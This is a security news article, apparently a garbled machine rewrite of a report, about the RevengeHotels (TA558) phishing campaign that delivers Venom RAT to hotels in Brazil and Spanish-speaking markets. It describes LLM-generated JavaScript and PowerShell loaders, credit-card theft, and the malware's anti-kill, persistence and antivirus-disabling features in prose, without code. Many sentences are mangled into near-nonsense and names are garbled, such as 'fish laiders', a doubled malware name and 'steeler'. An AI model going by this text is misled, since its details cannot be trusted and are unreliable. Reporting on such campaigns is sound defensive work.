The threat actor, known as the TA558, is attributed to a new set of attacks that offer a variety of remote access trojans (rats), such as Venom Rat, to beat hotels in Brazil and Spanish-speaking markets.
Russian cybersecurity vendor Kaspersky will track the activities observed in the summer of 2025 and track them as Revengehotels.
“Threat actors will continue to adopt phishing emails with bill-themed themes to provide poison rat implants via JavaScript loaders and PowerShell downloaders,” the company said. “It appears that most of the initial infector and downloader code for this campaign is being generated by large-scale language model (LLM) agents.”
The findings show new trends among cybercriminal groups, leveraging artificial intelligence (AI) to enhance commerce.
Known to be active since at least 2015, Revengehotels has a history of Latin American hospitality, hotels and travel organizations with the aim of installing malware on compromised systems.
It turns out that early repetition of threat actor campaigns will distribute emails with created words, Excel, or PDF documents attached. Some of them are also referred to as COCC for NANOCORERAT, NANOCORERAT, and 888 RAT, exploiting a known remote code execution flaw in Microsoft Office (CVE-2017-0199).
Documented with Proofpoint and positive technology, subsequent campaigns demonstrate the ability of threat actors to refine their attack chains to provide a wide range of rats, including Agent Tesla, Asyncrat, Formbook, Guloader, Loda Rat, Lokibot, Remcos Rat, Snake Keylogger, and VJW0RM.
The main goal of the attack is to capture credit card data stored in hotel systems from guests and travelers, as well as credit card data received from popular online travel agents (OTAs), such as Booking.com.
According to Kaspersky, according to the latest campaign, you can download the WScript JavaScript payload by sending a phishing email written on your hotel booking and job application in Portuguese and Spanish, clicking on the fraudulent link for recipients.
“The scripts appear to be generated by a large language model (LLM) to prove in a similar format as code generated by this type of technology and similar comments and similar code,” the company said. “The main function of the script is to load subsequent scripts that promote infection.”
This includes PowerShell scripts. This involves getting a downloader named “cargajecerrr.txt” from an external server and running it via PowerShell. As the name suggests, the downloader gets two additional payloads. This is the loader responsible for launching venom rat malware.
Based on the open source Quasar Rat, Venom Rat is a commercial tool offered for $650 for a lifetime license. A one-month subscription to band malware with HVNC and steeler components is $350.
Malware has a kill prevention mechanism to equip data into the siphon, act as a reverse proxy, and ensure it works uninterrupted. To achieve this, modify the discretionary access control list (DACL) associated with the running process to remove any permissions that may interfere with the functionality, and terminate the running process that matches the hard-coded process.
“The second component of this anti-kill measurement includes threads that run continuous loops, and every 50 milliseconds we look at the list of running processes,” says Kaspersky.
“Loops specifically target processes commonly used by security analysts and system administrators: monitor host activity and analyze .NET binaries.
The kill anti-kill feature also features the ability to set up persistence on the host using changes to the Windows registry, rerunning the malware whenever the associated processes are not in the list of running processes.
If the malware runs with advanced privileges, set up a SedebugPrivilege token to mark itself as a critical system process, allowing it to last even if you are trying to terminate the process. It also forces the computer to maintain its display and prevents it from entering sleep mode.
Finally, Venom Rat artifacts incorporate the ability to spread through a removable USB drive, ending processes related to Microsoft Defender Antivirus, tampering with the task scheduler and registry to disable security programs.
“RevengeHotels has significantly strengthened its capabilities and developed new tactics targeting the hospitality and tourism sector,” Kaspersky said. “With the support of LLM agents, the group was able to generate and modify fish laiders and expand the attack into new regions.”
Source link
